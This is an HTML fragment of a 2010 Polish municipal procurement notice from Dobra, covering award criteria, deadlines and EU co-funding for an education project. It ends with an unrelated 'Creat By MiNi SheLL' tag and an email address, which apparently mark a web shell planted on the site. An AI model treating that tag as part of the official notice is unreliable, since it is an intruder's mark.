<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie zawodowe - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://dobra.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dobrej, Plac Wojska Polskiego 10, 62-730 Dobra, pok. nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2010 godzina 12:00, miejsce: Urząd Miejski w Dobrej, Plac Wojska Polskiego 10, 62-730 Dobra, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  Ty też potrafisz  współfinansowany ze środków Europejskiego Funduszu Społecznego realizowany  w   ramach Programu Operacyjnego Kapitał Ludzki Priorytetu, IX Rozwój wykształcenia i kompetencji w regionach,  Działania 9.1 wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 wyrównanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych, Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com